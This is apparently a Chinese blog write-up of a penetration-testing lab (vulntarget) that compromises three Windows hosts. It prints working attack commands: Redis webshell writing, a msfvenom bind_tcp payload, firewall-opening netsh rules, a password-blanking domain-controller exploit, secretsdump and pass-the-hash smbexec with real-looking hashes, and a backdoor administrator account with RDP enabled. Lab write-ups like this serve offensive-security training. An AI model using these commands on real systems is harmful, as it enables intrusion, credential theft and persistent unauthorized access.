常规操作,先扫
,web端口,rpc,和445开放,看看web
通达oa,工具尝试getshell
cs上线
挂代理走一波,发现就一个hello world,扫一下
扫到这个,暂时留着,nmap扫一下,发现开启了6379,也就是redis,直接连
参考文章:Redis Getshell方法总结 – 天下大木头 (wjlshare.com)
用绝对路径写shell
访问c.php
发现仍是system权限。
查看是否在域内
查看域管理员
ping一下,获得ip
剩下就没啥了,还是直接上cs。
急了,cs第二层怎么都挂不上,急了,换msf
生成木马
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=8091 -f exe > 8091_bind.exe
关闭服务器防火墙
netsh advfirewall firewall add rule name="bind tcp" protocol=TCP dir=in localport=8091 action=allow
msf开启监听。
拿到第二台主机的msf,获得密码
添加一下路由,ip之前就知道了,主要是后续代理挂不上了,,,
run post/windows/manage/migrate
run post/multi/manage/autoroute
然后利用漏洞把密码制空
然后dump出来impacket/secretsdump.py at master · SecureAuthCorp/impacket (github.com)
proxychains python3 secretsdump.py vulntarget.com/win2019\$@10.0.10.110 -no-pass
msf开启代理
msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 0.
[*] Starting the SOCKS proxy server
然后利用smbexec,拿到shell
proxychains python3 smbexec.py -hashes ad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15 vulntarget.com/administrator@10.0.10.110
创建新用户,然后开远程桌面
net user snowywar Admin@123 /add
命令成功完成。
C:\Windows\system32>net localgroup administrators snowywar/add
命令成功完成。
reg add "HKLM\System\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /f
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
还是一样,上传木马然后转shell监听到msf内即可,还有关闭防火墙
netsh advfirewall firewall add rule name="bind tcp" protocol=TCP dir=in localport=8091 action=allow
最后拿下三台主机,通关
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧